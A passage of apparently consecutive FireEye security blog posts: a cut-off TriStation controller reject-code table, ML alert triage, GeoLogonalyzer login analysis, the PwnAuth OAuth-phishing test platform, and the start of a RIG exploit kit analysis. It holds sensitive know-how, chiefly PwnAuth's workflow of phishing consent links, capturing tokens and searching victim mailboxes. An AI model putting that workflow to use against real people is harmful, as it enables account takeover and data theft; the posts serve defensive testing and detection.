126: 'Node number set',

7F

127: 'Get MP status response',

80

128: 'Retentive values set',

81

129: 'SOE block set',

82

130: 'Module alarms cleared',

83

131: 'Get event log response',

84

132: 'Symbol table ccepted',

85

133: 'OVD enable accepted',

86

134: 'OVD disable accepted',

87

135: 'Record event log response',

88

136: 'Upload network response',

89

137: 'Get SOE data response',

8A

138: 'Alocate network accepted',

8B

139: 'Load vector table accepted',

8C

140: 'Get calendar response',

8D

141: 'Label set',

8E

142: 'Get module types response',

8F

143: 'System variables configured',

90

144: 'Module deconfigured',

91

145: '<145>',

92

146: '<146>',

93

147: 'Get conversion table response',

94

148: 'ICM print data sent',

95

149: 'Set ICM status response',

96

150: 'Get system variables response',

97

151: 'Get module versions response',

98

152: 'Process MODBUS response',

99

153: 'Allocate program response',

9A

154: 'Allocate function response',

9B

155: 'Clear retentives response',

9C

156: 'Set initial values response',

9D

157: 'Set TS2 data area response',

9E

158: 'Get TS2 data response',

9F

159: 'Set TS2 data response',

A0

160: 'Set program information reponse',

A1

161: 'Get program information response',

A2

162: 'Upload program response',

A3

163: 'Upload function response',

A4

164: 'Get point groups response',

A5

165: 'Allocate symbol table response',

A6

166: 'Program timing response',

A7

167: 'Disable points full',

A8

168: 'Allocate multiple functions response',

A9

169: 'Get node number response',

AA

170: 'Symbol table response',

AB

 

AC

 

AD

 

AE

 

AF

 

B0

 

B1

 

B2

 

B3

 

B4

 

B5

 

B6

 

B7

 

B8

 

B9

 

BA

 

BB

 

BC

 

BD

 

BE

 

BF

 

C0

 

C1

 

C2

 

C3

 

C4

 

C5

 

C6

 

C7

 

C8

200: 'Wrong command',

C9

201: 'Load is in progress',

CA

202: 'Bad clock calendar data',

CB

203: 'Control program not halted',

CC

204: 'Control program checksum error',

CD

205: 'No memory available',

CE

206: 'Control program not valid',

CF

207: 'Not loading a control program',

D0

208: 'Network is out of range',

D1

209: 'Not enough arguments',

D2

210: 'A Network is missing',

D3

211: 'The download time mismatches',

D4

212: 'Key setting prohibits this operation',

D5

213: 'Bad control program version',

D6

214: 'Command not in correct sequence',

D7

215: '<215>',

D8

216: 'Bad Index for a module',

D9

217: 'Module address is invalid',

DA

218: '<218>',

DB

219: '<219>',

DC

220: 'Bad offset for an I/O point',

DD

221: 'Invalid point type',

DE

222: 'Invalid Point Location',

DF

223: 'Program name is invalid',

E0

224: '<224>',

E1

225: '<225>',

E2

226: '<226>',

E3

227: 'Invalid module type',

E4

228: '<228>',

E5

229: 'Invalid table type',

E6

230: '<230>',

E7

231: 'Invalid network continuation',

E8

232: 'Invalid scan time',

E9

233: 'Load is busy',

EA

234: 'An MP has re-educated',

EB

235: 'Invalid chassis or slot',

EC

236: 'Invalid SOE number',

ED

237: 'Invalid SOE type',

EE

238: 'Invalid SOE state',

EF

239: 'The variable is write protected',

F0

240: 'Node number mismatch',

F1

241: 'Command not allowed',

F2

242: 'Invalid sequence number',

F3

243: 'Time change on non-master TRICON',

F4

244: 'No free Tristation ports',

F5

245: 'Invalid Tristation I command',

F6

246: 'Invalid TriStation 1131 command',

F7

247: 'Only one chassis allowed',

F8

248: 'Bad variable address',

F9

249: 'Response overflow',

FA

250: 'Invalid bus',

FB

251: 'Disable is not allowed',

FC

252: 'Invalid length',

FD

253: 'Point cannot be disabled',

FE

254: 'Too many retentive variables',

FF

255: 'LOADER_CONNECT',

 

256: 'Unknown reject code'

Reverse Engineering the Analyst: Building Machine Learning Models for the SOC

Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks.

The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the “Analyze/ Decide” block in Figure 1.


Figure 1: Basic SOC triage stages

In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow – all with the ultimate goal of automating alert triage and freeing up analyst time.

Reverse Engineering the Analyst

Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine if the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore if, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones.

Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as “malicious” or “benign”. How can we capture the analysis and determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence?

Basic Supervised Model Process

The data science term for this is a “Supervised Classification Model”. It is “supervised” in the sense that it learns by being shown data already labeled as benign or malicious, and it is a “classification model” in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two “classes” of alerts: malicious and benign.

In order to begin creating such a model, a dataset must be collected. This dataset forms the “experience” of the model, and is the information we will use to “train” the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign. Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or “labeling”) thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts.

Once a labeled dataset has been defined, the next step is to define “features” that can be used to portray the information resident in each alert. A “feature” can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural “feature” could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision.

Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a “test set” to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known.

Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance.

Feature Engineering

Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is “easy”, we ask: “Why? And what helps you make that decision?” It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis.

For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields:

  • Process Path
  • Process MD5
  • Parent Process
  • Process Command Arguments

While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields.

Beginning with the process path of, say, “C:\windows\temp\m.exe”, an analyst can immediately see some features:

  • The process resides in a temporary folder: C:\windows\temp\
  • The process is two directories deep in the file system
  • The process executable name is one character long
  • The process has an .exe extension
  • The process is not a “common” process name

While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to “teach” the model to view processes the way an analyst does.

The features are then encoded into a more discrete representation, similar to this:

Temp_folder

Depth

Name_Length

Extension

common_process_name

TRUE

2

1

exe

FALSE

Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from expected “lineage” can be a strong indicator of malicious activity.

Say the parent process of the aforementioned example was ‘powershell.exe’. Potential new features could then be derived from the concatenation of the parent process and the process itself: ‘powershell.exe_m.exe’. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact.

The richest field, however, is probably the process arguments. Process arguments are their own sort of language, and language analysis is a well-tread space in predictive analytics.

We can look for things including, but not limited to:

  • Network connection strings (such as ‘http://’, ‘https://’, ‘ftp://’).
  • Base64 encoded commands
  • Reference to Registry Keys (‘HKLM’, ‘HKCU’)
  • Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon’s work for more)

The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships.

For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue).


Figure 2: Distribution of Process Event alerts grouped by Process Command Length

This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious. This manifests as red on the right and blue on the left. However, process length is not the only factor.

As part of our feature set, we also thought it would be useful to approximate the “complexity” of each command. For this, we used “Shannon entropy”, a commonly used metric that measures the degree of randomness present in a string of characters.

Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious.


Figure 3: Distribution of Process Event alerts grouped by entropy

Model Selection and Generalization

Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious.

For our use case, it also made sense to prioritize an ‘interpretable’ model – that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes that the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well-suited for alert classification.

There are many publicly available resources to learn about decision trees, but the basic intuition behind a decision tree is that it is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game “Twenty Questions” is familiar with this concept. Initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow down the possibilities. After enough questions are asked and answered, the ‘questioner’ feels they have a high probability of guessing the right answer.

Figure 4 shows an example of a decision tree that one might use to evaluate process executions.


Figure 4: Decision tree for deciding whether an alert is benign or malicious

For the example alert in the diagram, the “decision path” is marked in red. This is how this decision tree model makes a prediction. It first asks: “Is the length greater than 100 characters?” If so, it moves to the next question “Does it contain the string ‘http’?” and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious.

Because they can ask such detailed combinations of questions, it is possible that decision trees can “overfit”, or learn rules that are too closely tied to the training set. This reduces the model’s ability to “generalize” to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each “vote” on the outcome. This “ensemble” of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model.

How the SOC Alert Model Works

When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this “feature vector” and applies a confidence level for the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign.


Figure 5: An alert presented to the analyst with its raw values captured

As an example, the event shown in Figure 5 might create the following feature values:

  • Parent Process: ‘wscript’
  • Command Entropy: 5.08
  • Command Length =103

Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal “leaf” classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification.

For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into “why” the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the “explanation” for this alert might look like:

  • Command Entropy = 5.08 > 4.60:  51.73% Threat
  • occuranceOfChar “\”= 9.00 > 4.50:  64.09% Threat
  • occuranceOfChar:“)” (=0.00) <= 0.50: 78.69% Threat
  • NOT processTree=”cmd.exe_to_cscript.exe”: 99.6% Threat

Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance.

How the SOC Uses the Model

Showing the features the model used to reach the conclusion allows experienced analysts to compare their approach with the model, and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they may have otherwise missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned on the collective experience of every analyst over thousands of alerts. Therefore, the model provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues.

Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule to say: “If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report.” Or, if there is a storm of probable false positives, one could write a rule to cull the herd of false positives using a model score below 10.

How the Model Stays Effective

The day the model is trained, it stops learning. However, threats – and therefore alerts – are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment.

Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify if the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and discover potential new features that may be necessary.

To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version.

We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and the explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store this label provided by the analyst along with any optional explanation given by them regarding the explanation.

Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert, in which network command and control communications were sinkholed. An analyst may evaluate the alert, pull back triage details, including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as ‘benign’. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization. However, if the benign label is used when retraining the model, that will teach the model that something inherently malicious is in fact benign, and potentially lead to false negatives in the future.

Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps to build confidence in the model, so we can automate more tasks and free up analyst time to perform tasks such as hunting and investigation.

Conclusion

A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they utilize investigative skills and creativity on the threats that truly require expertise.

This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients.

The process and examples shown discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts’ expertise where it is needed most. In a world of ever increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion.

Acknowledgements

A big thank you to Seth Summersett and Clara Brooks.

***

The FireEye ICE Data Science Team is a small, highly trained team of data scientists and engineers, focused on delivering impactful capabilities to our analysts, products, and customers. ICE-DS is always looking for exceptional candidates interested in researching and solving difficult problems in cybersecurity. If you’re interested, check out  FireEye careers.

Remote Authentication GeoFeasibility Tool – GeoLogonalyzer

Users have long needed to access important resources such as virtual private networks (VPNs), web applications, and mail servers from anywhere in the world at any time. While the ability to access resources from anywhere is imperative for employees, threat actors often leverage stolen credentials to access systems and data. Due to large volumes of remote access connections, it can be difficult to distinguish between a legitimate and a malicious login.

Today, we are releasing GeoLogonalyzer to help organizations analyze logs to identify malicious logins based on GeoFeasibility; for example, a user connecting to a VPN from New York at 13:00 is unlikely to legitimately connect to the VPN from Australia five minutes later.

Once remote authentication activity is baselined across an environment, analysts can begin to identify authentication activity that deviates from business requirements and normalized patterns, such as:

  1. User accounts that authenticate from two distant locations, and at times between which the user probably could not have physically travelled the route.
  2. User accounts that usually log on from IP addresses registered to one physical location such as a city, state, or country, but also have logons from locations where the user is not likely to be physically located.
  3. User accounts that log on from a foreign location at which no employees reside or are expected to travel to, and your organization has no business contacts at that location.
  4. User accounts that usually log on from one source IP address, subnet, or ASN, but have a small number of logons from a different source IP address, subnet, or ASN.
  5. User accounts that usually log on from home or work networks, but also have logons from an IP address registered to cloud server hosting providers.
  6. User accounts that log on from multiple source hostnames or with multiple VPN clients.

GeoLogonalyzer can help address these and similar situations by processing authentication logs containing timestamps, usernames, and source IP addresses.

GeoLogonalyzer can be downloaded from our FireEye GitHub.

GeoLogonalyzer Features

IP Address GeoFeasibility Analysis

For a remote authentication log that records a source IP address, it is possible to estimate the location each logon originated from using data such as MaxMind’s free GeoIP database. With additional information, such as a timestamp and username, analysts can identify a change in source location over time to determine if that user could have possibly traveled between those two physical locations to legitimately perform the logons.

For example, if a user account, Meghan, logged on from New York City, New York on 2017-11-24 at 10:00:00 UTC and then logged on from Los Angeles, California 10 hours later on 2017-11-24 at 20:00:00 UTC, that is roughly a 2,450 mile change over 10 hours. Meghan’s logon source change can be normalized to 245 miles per hour which is reasonable through commercial airline travel.

If a second user account, Harry, logged on from Dallas, Texas on 2017-11-25 at 17:00:00 UTC and then logged on from Sydney, Australia two hours later on 2017-11-25 at 19:00:00 UTC, that is roughly an 8,500 mile change over two hours. Harry’s logon source change can be normalized to 4,250 miles per hour, which is likely infeasible with modern travel technology.

By focusing on the changes in logon sources, analysts do not have to manually review the many times that Harry might have logged in from Dallas before and after logging on from Sydney.

Cloud Data Hosting Provider Analysis

Attackers understand that organizations may either be blocking or looking for connections from unexpected locations. One solution for attackers is to establish a proxy on either a compromised server in another country, or even through a rented server hosted in another country by companies such as AWS, DigitalOcean, or Choopa.

Fortunately, Github user “client9” tracks many datacenter hosting providers in an easily digestible format. With this information, we can attempt to detect attackers utilizing datacenter proxy to thwart GeoFeasibility analysis.

Using GeoLogonalyzer

Usable Log Sources

GeoLogonalyzer is designed to process remote access platform logs that include a timestamp, username, and source IP. Applicable log sources include, but are not limited to:

  1. VPN
  2. Email client or web applications
  3. Remote desktop environments such as Citrix
  4. Internet-facing applications
Usage

GeoLogonalyzer’s built-in –csv input type accepts CSV formatted input with the following considerations:

  1. Input must be sorted by timestamp.
  2. Input timestamps must all be in the same time zone, preferably UTC, to avoid seasonal changes such as daylight savings time.
  3. Input format must match the following CSV structure – this will likely require manually parsing or reformatting existing log formats:

YYYY-MM-DD HH:MM:SS, username, source IP, optional source hostname, optional VPN client details

GeoLogonalyzer’s code comments include instructions for adding customized log format support. Due to the various VPN log formats exported from VPN server manufacturers, version 1.0 of GeoLogonalyzer does not include support for raw VPN server logs.

GeoLogonalyzer Usage

Example Input

Figure 1 represents an example input VPNLogs.csv file that recorded eight authentication events for the two user accounts Meghan and Harry. The input data is commonly derived from logs exported directly from an application administration console or SIEM.  Note that this example dataset was created entirely for demonstration purposes.


Figure 1: Example GeoLogonalyzer input

Example Windows Executable Command

GeoLogonalyzer.exe --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Python Script Execution Command

python GeoLogonalyzer.py --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Output

Figure 2 represents the example output GeoLogonalyzedVPNLogs.csv file, which shows relevant data from the authentication source changes (highlights have been added for emphasis and some columns have been removed for brevity):


Figure 2: Example GeoLogonalyzer output

Analysis

In the example output from Figure 2, GeoLogonalyzer helps identify the following anomalies in the Harry account’s logon patterns:

  1. FAST - For Harry to physically log on from New York and subsequently from Australia in the recorded timeframe, Harry needed to travel at a speed of 4,297 miles per hour.
  2. DISTANCE – Harry’s 8,990 mile trip from New York to Australia might not be expected travel.
  3. DCH – Harry’s logon from Australia originated from an IP address associated with a datacenter hosting provider.
  4. HOSTNAME and CLIENT – Harry logged on from different systems using different VPN client software, which may be against policy.
  5. ASN – Harry’s source IP addresses did not belong to the same ASN. Using ASN analysis helps cut down on reviewing logons with different source IP addresses that belong to the same provider. Examples include logons from different campus buildings or an updated residential IP address.

Manual analysis of the data could also reveal anomalies such as:

  1. Countries or regions where no business takes place, or where there are no employees located
  2. Datacenters that are not expected
  3. ASN names that are not expected, such as a university
  4. Usernames that should not log on to the service
  5. Unapproved VPN client software names
  6. Hostnames that are not part of the environment, do not match standard naming conventions, or do not belong to the associated user

While it may be impossible to determine if a logon pattern is malicious based on this data alone, analysts can use GeoLogonalyzer to flag and investigate potentially suspicious logon activity through other investigative methods.

GeoLogonalyzer Limitations

Reserved Addresses

Any RFC1918 source IP addresses, such as 192.168.X.X and 10.X.X.X, will not have a physical location registered in the MaxMind database. By default, GeoLogonalyzer will use the coordinates (0, 0) for any reserved IP address, which may alter results. Analysts can manually edit these coordinates, if desired, by modifying the RESERVED_IP_COORDINATES constant in the Python script.

Setting this constant to the coordinates of your office location may provide the most accurate results, although may not be feasible if your organization has multiple locations or other point-to-point connections.

GeoLogonalyzer also accepts the parameter –skip_rfc1918, which will completely ignore any RFC1918 source IP addresses and could result in missed activity.

Failed Logon and Logoff Data

It may also be useful to include failed logon attempts and logoff records with the log source data to see anomalies related to source information of all VPN activity. At this time, GeoLogonalyzer does not distinguish between successful logons, failed logon attempts, and logoff events. GeoLogonalyzer also does not detect overlapping logon sessions from multiple source IP addresses.

False Positive Factors

Note that the use of VPN or other tunneling services may create false positives. For example, a user may access an application from their home office in Wyoming at 08:00 UTC, connect to a VPN service hosted in Georgia at 08:30 UTC, and access the application again through the VPN service at 09:00 UTC. GeoLogonalyzer would process this application access log and detect that the user account required a FAST travel rate of roughly 1,250 miles per hour which may appear malicious. Establishing a baseline of legitimate authentication patterns is recommended to understand false positives.

Reliance on Open Source Data

GeoLogonalyzer relies on open source data to make cloud hosting provider determinations. These lookups are only as accurate as the available open source data.

Preventing Remote Access Abuse

Understanding that no single analysis method is perfect, the following recommendations can help security teams prevent the abuse of remote access platforms and investigate suspected compromise.

  1. Identify and limit remote access platforms that allow access to sensitive information from the Internet, such as VPN servers, systems with RDP or SSH exposed, third-party applications (e.g., Citrix), intranet sites, and email infrastructure.
  2. Implement a multi-factor authentication solution that utilizes dynamically generated one-time use tokens for all remote access platforms.
  3. Ensure that remote access authentication logs for each identified access platform are recorded, forwarded to a log aggregation utility, and retained for at least one year.
  4. Whitelist IP address ranges that are confirmed as legitimate for remote access users based on baselining or physical location registrations. If whitelisting is not possible, blacklist IP address ranges registered to physical locations or cloud hosting providers that should never legitimately authenticate to your remote access portal.
  5. Utilize either SIEM capabilities or GeoLogonalyzer.py to perform GeoFeasibility analysis of all remote access on a regular frequency to establish a baseline of accounts that legitimately perform unexpected logon activity and identify new anomalies. Investigating anomalies may require contacting the owner of the user account in question. FireEye Helix analyzes live log data for all techniques utilized by GeoLogonalyzer, and more!

Download GeoLogonalyzer today.

Acknowledgements

Christopher Schmitt, Seth Summersett, Jeff Johns, and Alexander Mulfinger.

Shining a Light on OAuth Abuse with PwnAuth

Introduction

Spear phishing attacks are seen as one of the biggest cyber threats to an organization. It only takes one employee to enter their credentials or run some malware for an entire organization to become compromised. As such, companies devote significant resources to preventing credential harvesting and payload-driven social engineering attacks. Less attention, however, has been paid to a non-traditional, but just as dangerous, method of social engineering: OAuth abuse. In an OAuth abuse attack, a victim authorizes a third-party application to access their account. Once authorized, the application can access the user's data without the need for credentials and bypassing any two-factor authentication that may be in place.

Today, I’m releasing PwnAuth, a platform to allow organizations and penetration testers an opportunity to test their ability to detect and respond to OAuth abuse social engineering campaigns. In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders.

Head over to our GitHub to start using PwnAuth.

What is OAuth?

OAuth 2.0 is described as "An open protocol to allow secure authorization in a simple and standard method from web, mobile and desktop applications..." It has become the de facto protocol that major Internet companies such as Amazon, Google, Facebook, and Microsoft use to facilitate granting third-party applications access to user data. An application that accesses your Microsoft OneDrive to allow for easy file sharing is an example of an application that would leverage OAuth.

Let’s use an application accessing OneDrive as an example to define some roles in an OAuth authorization flow:

The Application, or "Client"

The third-party application that is requesting access. In this case, the application that wishes to access your OneDrive files is the "Client."

The API "Resource"

The target application the "Client" wishes to access. In this case, the Microsoft OneDrive API endpoint is the "Resource."

The "Resource Owner"

The person granting access to a portion of their account. In this case, you.

The Authorization Server

The Authorization Server presents the interface that the Resource Owner uses to give or deny consent. The server could be the same as the API Resource or a different component. In this case, the Microsoft login portal is the "Authorization Server".

Scope

The Scope is defined as the type of access that the third-party application is requesting. Most API Resources will define a set of scopes that applications can request. This is similar to the permissions that an Android phone application would request on installation. In this example, the application may request access to your OneDrive files and user profile.

OAuth 2.0 provides several different authorization "grant types" to facilitate the different applications that we, as users, interact with. For the purpose of this post, we are interested in the "Authorization Code" grant type, which is used by web applications implementing OAuth. The following is an example authorization flow:

1.  A "Consent" link is created that directs the Resource Owner to the Authorization Server with parameters identifying the Application and the scopes requested.

https://login.microsoftonline.com/auth
?response_type=code
&client_id=123456789
&redirect_uri=https%3A%2F%2Fexample-app.com%2Fcallback
&scope=mail.read+offline_access

2.  The Resource Owner will be presented with an authorization prompt, stating the application name and requested scopes. The Resource Owner has the option to approve or deny this authorization request.

3.  Upon approval, the Authorization Server will redirect back to the Application with an authorization code.

HTTP/1.1 200 OK
Content-Type: application/json
Cache-Control: no-store
Pragma: no-cache
   
{
"access_token":"aMQe28fhjad8fasdf",
"token_type":"bearer",
"expires_in":3600,
"refresh_token":"OWWGE3YmIwOGYzYTlmM2YxNmMDFkNTVk",
"scope":"mail.read+offline_access"
}

4.  The Application can then use the authorization code and request an access token from the Authorization Server. Access tokens can be used for a set duration of time to access the user’s data from the API Resource, without any further action by the Resource Owner.

Room For Abuse

OAuth applications provide an ideal vector through which attackers could compromise a target and harvest confidential data such as email, contacts, and files. An attacker could create a malicious application and use the obtained access tokens to retrieve victims' account data via the API Resource. The access tokens do not require knowledge of the user's password, and bypass any two-factor enforcement. Further, the only way to remove an attacker's access is to explicitly revoke access to the OAuth application. In order to obtain OAuth tokens, an attacker would need to convince a victim to click a "Consent link" and approve the application via social engineering. Because all victim interaction is on sites owned by the legitimate Resource Provider (e.g. Microsoft), it can be hard for an untrained user to differentiate between a legitimate OAuth application and a malicious one.

Though likely not the first instance of such campaigns, OAuth abuse first came to the media's attention during the 2016 presidential election. FireEye wrote about APT28's usage of OAuth abuse to gain access to emails of U.S. politicians in our M-TRENDS 2017 report. Since then, FireEye has seen the technique spread to commodity worms seeking to spread across Gmail.

PwnAuth

PwnAuth is a web application framework I wrote to make it easier for organizations to test their ability to detect and respond to OAuth abuse campaigns. The web application provides penetration testers with an easy-to-use UI to manage malicious OAuth applications, store gathered OAuth tokens, and interact with API Resources. The application UI and framework are designed to be easily extendable to other API Resources through the creation of additional modules. While any cloud environment that allows OAuth applications could be targeted, currently PwnAuth ships with a module to support malicious Office 365 applications that will capture OAuth tokens and facilitate interaction with the Microsoft Graph API using those captured tokens. The Office 365 module itself could be further extended, but currently provides the following:

  • Reading mail messages
  • Searching the user's mailbox
  • Reading the user's contacts
  • Downloading messages and attachments
  • Searching OneDrive and downloading files
  • Sending messages on behalf of the user

The interface is designed to be intuitive and user-friendly. The first step to using PwnAuth would be to create a Microsoft Application. That information must then be entered into PwnAuth (Figure 1).


Figure 1: Importing a Microsoft App into PwnAuth

Once configured, you can use the generated "Authorization URL" to phish potential victims. When clicked, PwnAuth will capture victim OAuth tokens for later use. An example victim listing is shown in Figure 2.


Figure 2: Listing victim users in PwnAuth

Once PwnAuth has captured a victim's OAuth token, you can begin to access their data. Use PwnAuth to query the victim's mailbox for all messages containing the string "password", for example (Figure 3).


Figure 3: Searching the mailbox of a victim

See the GitHub wiki for more information on usage.

Mitigations

Our FireEye technology stack includes network-based signatures to detect potentially malicious OAuth consent URLs. Attackers tend to include certain scopes in malicious apps that can be detected and flagged. Organizations with social engineering training programs can add OAuth abuse scenarios to their existing programs to better educate users about this attacker vector. Additionally, organizations can take steps to limit the potential impact of malicious OAuth applications and increase their detection capabilities. The options available to an organization vary greatly depending on the API Resource, but, in general, include:

  • Limit the API scopes third-party apps can request.
  • Disable third-party apps in an organization.
  • Implement a whitelist or blacklist for applications.
  • Query an organization's user base for all consented applications.
  • Log any user consent events and report suspicious activity.

Office 365 in particular offers some options for administrators:

I have created a collection of scripts to assist administrators in hunting for malicious OAuth applications in cloud environments. Currently there is a script to investigate Office 365 tenants with plans to add other cloud environments.

Conclusion

OAuth abuse attacks are a dangerous and non-traditional phishing technique that attackers can use to gain access to an organization's confidential data. As we move more services to the cloud, organizations should be careful to lock down third-party application access and ensure that their monitoring and detection strategy covers application consent grants. Organizations and security professionals can use PwnAuth to test their ability to detect and respond to this new type of attack.

Head over to our GitHub and start using PwnAuth today.

A Deep Dive Into RIG Exploit Kit Delivering Grobios Trojan

As discussed in previous blogs, exploit kit activity has been on the decline since the latter half of 2016. However, we do still periodically observe significant developments in this space, and we have been observing interesting ongoing activity involving RIG Exploit Kit (EK). Although the volume of its traffic observed in-the-wild has been on the decline, RIG EK remains active, with a wide range of associated crimeware payloads.

In this recent finding, RIG EK was observed delivering a Trojan named Grobios. This blog post will discuss this Trojan in depth with a focus on its evasion and anti-sandbox techniques, but first let’s take a quick look at the attack flow. Figure 1 shows the entire infection chain for the activity we observed.


Figure 1: Infection chain

We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it (Figure 2).


Figure 2: Malicious Iframe injected in latorre[.]com

The iframe loads a malvertisement domain, which communicates over SSL (certificate shown in Figure 3) and leads to the RIG EK landing page that loads the malicious Flash file (Figure 4).


Figure 3: Malicious SSL flow


Figure 4: RIG EK SWF download request

When opened, the Flash file drops the Grobios Trojan. Figure 5 shows the callback traffic from the Grobios Trojan.


Figure 5: Grobios callback

Analysis of the Dropped Malware

